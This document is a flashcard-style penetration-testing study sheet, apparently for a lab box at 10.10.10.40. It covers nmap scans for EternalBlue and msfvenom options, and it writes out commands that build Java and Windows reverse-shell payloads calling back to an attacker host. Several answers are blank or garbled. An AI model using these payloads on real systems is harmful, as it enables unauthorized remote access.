How do you use sqlmap?
What is the MS Bulletin for eternalblue? What is the name in nmap?
- smb-vuln-ms17-010
What is the starting nmap command?
nmap -sV -sC -oA nmap-scripts 10.10.10.40
What is the nmap command for specifically looking for Eternalblue?
nmap -p 445 –script safe -Pn -n 10.10.10.40
MSFvenom: List available payloads
msfvenom -l payloads
What is a Staged Payload?
What is a Stagless Payload?
What are the MSFvenom flags for Architecture and Platform?
- Platform = –platform
What is the MSFvenom flag for bad characters and what is an example of its use?
- Example: -b ‘\x00\x0a\x0d\x20’
What is the best and mot common encode for MSFvenom?
What is the MSFvenom flag to make with the lowest number of bytes?
–smallest
What flag do you add onto the end of MSFvenom to fill out the remaining size of the shellcode with a NOP sled?
- Example: -n 20
MSFvenom: Java Reverse Shell
msfvenom -p java/jsp_shell_reverse_tcp L HOST=? LPORT=? -f raw > shell.jsp
MSFvenom: Windows Reverse Shell (Powershell)
msfvenom -a x86 –platform windows -p windows/powershell_reverse_tcp LHOST= LPORT= -f python
MSFvenom: Windows Reverse Shell (Shell)
msfvenom -a x86 –platform windows -p windows/shell_reverse_tcp LHOST= LPORT= -f python
What is the command to start an Apache server?
What is the command to watch access log data on the Apache server?
tail -f /var/log/apache2/access.log
What is the command to watch connections being made on your tun0 interface?
tcpdump -i tun0